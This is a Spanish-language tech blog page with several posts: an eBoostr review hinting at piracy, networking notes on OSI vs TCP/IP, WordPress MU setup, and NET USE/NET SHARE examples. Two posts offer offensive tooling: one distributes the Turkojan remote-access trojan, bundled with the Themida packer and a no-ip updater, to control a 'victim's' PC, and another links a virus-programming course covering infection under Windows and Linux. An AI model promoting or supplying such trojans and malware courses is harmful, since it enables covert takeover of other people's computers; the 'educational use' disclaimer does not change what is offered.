EN BREVE VOLVEMOS A LA CARGA CON EL BLOG

EBoostr "Acelera la velocidad de Windows mediante memoria adicional"

Author: Jose Sanchez /

Una de las mejores novedades presentes en Windows Vista es ReadyBoost: significa que el sistema operativo tiene la capacidad de utilizar memorias USB (2.0, o pendrives) como memoria RAM (virtual) para de esa manera aumentar el rendimiento del sistema como tal.

Hasta ahora en Windows XP no existía esta capacidad. Sin embargo existe un software (de pago: mis disculpas a todos los usuarios, pues en Blog Informático suelo difundir software gratis; ésta es una excepción especial) llamado eBoostr que nos trae a XP esta función.

He tenido la oportunidad de obtener el software completo (no diré a través de qué medios pues no quiero ser tentativo) y lo probé en mi Windows XP: si quieren mi opinión personal (y muy sincera), les quiero decir que eBoostr funciona perfectamente bien. Estoy contento.

eBoostr se instala en el sistema, pide reiniciar; conectamos la memoria USB (pendrive), y el mismo nos indicará cuánto espacio tenemos libre en dicha memoria, que será usado como memoria RAM. En mi caso, una memoria de 8GB y libre 1.5GB, que usé como RAM.

El valor del software es de 30$, pero la verdad es que vale la pena. Sin duda eBoostr es una manera muy efectiva de aplicar la mejor optimizacion a nuestro sistema operativo. Si aún tienes dudas, puedes descargar la versión de evaluación y probarlo ahora mismo.


EBOOSTR

Turkojan

Author: Jose Sanchez / Etiquetas:

Con este programa podemos acceder a todos los rincones del PC de nuestra víctima , manejar su ratón ver sur fotos borrarle archivos desinstalarle programas en fin de todo lo que te puedas imaginar es como si el PC lo tuvieras frente a ti.




Incluye:

Tutorial, Turkojan, Themida, DUC no-ip

ESTE TUTORIAL HA SIDO REALIZADO PARA USO EDUCATIVO CUALQUIER USO INAPROPIADO QUE SE LE DE AL MISMO SERÁ RESPONSABILIDAD DE QUIEN LO USE.

Tutorial

Pack



Curso Programacion de Virus

Author: Jose Sanchez / Etiquetas:


La proposito de este curso es el aprendizaje de métodos en programación, tanto en teoría como en practica,de virus informáticos. No obstante, no se ofrece el camino típico; esto es, aprender ensamblador, aprender formatos de ficheros e infectar.

Con esto no se pretende que te pongas a diseñar malware como una vestia sin saber ni papa de lo que haces, síno que entiendas los conceptos y adquieras experiencía en el tema,se trata pues de dar una visión general acerca de todo aquello que se va a tocar (arquitectura de un computador y sistemas operativos), necesaria antes de empezar a programar nada, y con esto en mente debería de resultar muchísimo mas sencillo ya no sólo programar virus, sino desarrollar cualquier otro tipo de aplicaciones que necesiten conocimientos de este estilo.

  1. Estructura de computadores
  2. Fundamentos de SSOO
  3. Sistemas de numeración
  4. Ensamblador 1: Conceptos básicos
  5. Ensamblador 2: Conceptos Avanzados
  6. Utilidades para la programación
  7. Infección bajo Windows
  8. Infección bajo Linux
  9. Ticónicas avanzadas
http://www.adrive.com/public/e7f02d7e712836b207fc601be7f6270ac4df3046f4d09c456aaa523f1543b4fb.html

Servidor Wordpress Mu con Xampp

Author: Jose Sanchez /

Debido a numerosos problemas personales me ha sido imposible actualizar la pagina, pero parece que todo esta solucionado y podremos ponernos en camino con esto mas a menudo queridos bloggers.
Por lo pronto os comento paso a paso, con sus correspondienes capturas de pantalla como crear una cuenta de Wordpress MU, con su correspondiente base de datos sql, y utlizando el programa xampp podeis verlo mejor mediante este enlace directo:

Wordpress Mu desde cero con Xampp
Espero vuestros comentarios aunque solo sea para quejaros o pedir algo XD

TCP/IP vs OSI

Author: Jose Sanchez /

Hoy vamos a ver las diferencias entre dos de las arquitecturas de red mas importantes, la TCP/IP y OSI.

OSI

  • OSI es el Open Systems Interconnection Reference Model. Tiene siete niveles. En realidad no es una arquitectura particular, porque no especifica los detalles de los niveles, sino que los estándares de ISO existen para cada nivel.
  • Nivel físico. Cuestiones: los voltajes, la duración de un bit, el establecimiento de una conexión, el número de polos en un enchufe, etc.
  • Nivel de enlace. El propósito de este nivel es convertir el medio de transmisión crudo en uno que esté libre de errores de transmisión.
    • El remitente parte los datos de input en marcos de datos (algunos cientos de bytes) y procesa los marcos de acuse.
    • Este nivel maneja los marcos perdidos, dañados, o duplicados.
    • Regula la velocidad del tráfico.
    • En una red de broadcast, un subnivel (el subnivel de acceso medio, o medium access sublayer) controla el acceso al canal compartido.
  • Nivel de red. Determina el ruteo de los paquetes desde sus fuentes a sus destinos, manejando la congestión a la vez. Se incorpora la función de contabilidad.
  • Nivel de transporte. Es el primer nivel que se comunica directamente con su par en el destino (los de abajo son de máquina a máquina). Provee varios tipos de servicio (por ejemplo, un canal punto-a-punto sin errores). Podría abrir conexiones múltiples de red para proveer capacidad alta. Se puede usar el encabezamiento de transporte para distinguir entre los mensajes de conexiones múltiples entrando en una máquina. Provee el control de flujo entre los hosts.
  • Nivel de sesión. Parecido al nivel de transporte, pero provee servicios adicionales. Por ejemplo, puede manejar tokens (objetos abstractos y únicos) para controlar las acciones de participantes o puede hacer checkpoints (puntos de recuerdo) en las transferencias de datos.
  • Nivel de presentación. Provee funciones comunes a muchas aplicaciones tales como traducciones entre juegos de caracteres, códigos de números, etc.
  • Nivel de aplicación. Define los protocolos usados por las aplicaciones individuales, como e-mail, telnet, etc.

TCP/IP

  • Tiene como objetivos la conexión de redes múltiples y la capacidad de mantener conexiones aun cuando una parte de la subred esté perdida.
  • La red es packet-switched y está basada en un nivel de internet sin conexiones. Los niveles físico y de enlace (que juntos se llaman el "nivel de host a red" aquí) no son definidos en esta arquitectura.
  • Nivel de internet. Los hosts pueden introducir paquetes en la red, los cuales viajan independientemente al destino. No hay garantias de entrega ni de orden.

    Este nivel define el Internet Protocol (IP), que provee el ruteo y control de congestión.

  • Nivel de transporte. Permite que pares en los hosts de fuente y destino puedan conversar. Hay dos protocolos:
    • Transmission Control Protocol (TCP). Provee una conexión confiable que permite la entrega sin errores de un flujo de bytes desde una máquina a alguna otra en la internet. Parte el flujo en mensajes discretos y lo monta de nuevo en el destino. Maneja el control de flujo.
    • User Datagram Protocol (UDP). Es un protocolo no confiable y sin conexión para la entrega de mensajes discretos. Se pueden construir otros protocolos de aplicación sobre UDP. También se usa UDP cuando la entrega rápida es más importante que la entrega garantizada.
  • Nivel de aplicación. Como en OSI. No se usan niveles de sesión o presentación.

OSI vs. TCP/IP

  • OSI define claramente las diferencias entre los servicios, las interfaces, y los protocolos.
    • Servicio: lo que un nivel hace
    • Interfaz: cómo se pueden accesar los servicios
    • Protocolo: la implementación de los servicios
    TCP/IP no tiene esta clara separación.
  • Porque OSI fue definido antes de implementar los protocolos, los diseñadores no tenían mucha experiencia con donde se debieran ubicar las funcionalidades, y algunas otras faltan. Por ejemplo, OSI originalmente no tiene ningún apoyo para broadcast.
  • El modelo de TCP/IP fue definido después de los protocolos y se adecúan perfectamente. Pero no otras pilas de protocolos.
  • OSI no tuvo exíto debido a
    • Mal momento de introducción: insuficiente tiempo entre las investigaciones y el desarrollo del mercado a gran escala para lograr la estandarización
    • Mala tecnología: OSI es complejo, es dominado por una mentalidad de telecomunicaciones sin pensar en computadores, carece de servicios sin conexión, etc.
    • Malas implementaciones
    • Malas políticas: investigadores y programadores contra los ministerios de telecomunicación

¿Para que sirve el comando Net Use y Net Share?

Author: Jose Sanchez /

Este comando sirve para conectar automaticamente una unidad de red en windows.
Necesitamos que esta carpeta de red esté siempre conectada cuando el programa va a guardar los documentos. el problema es que windows xp no sabe recordar la contraseña con un usuario distinto al que nos logeamos en windows al entrar.
El comando es de msdos NET USE. Para conectar con otro usuario se utiliza el parametro “/USER:” Veamos unos ejemplos:

NET USE letraUnidad:\\IP_DEL_SERVIDOR\CarpetaElegida contraseña /USER:nombreDelUsuario

NET USE E: \\192.168.1.100\MiCarpetaElegida MiContraseña /USER:MiNombreDeUsuario


Comando Net Share


Es muy parecido al otro comando(Net Use) tan solo que este tiene beneficios de administrador y muestra una lista de recursos compartidos que tiene tu PC, se pueden agregar más recursos o quitarlos, haz una prueba.
Primero marca net share\(el nombre de la carpeta creada en tu unidad de red propia)=(unidad de redcon 2 puntos)\ nombre de la carpeta

Ejemplo: net share redes2=c:\redes2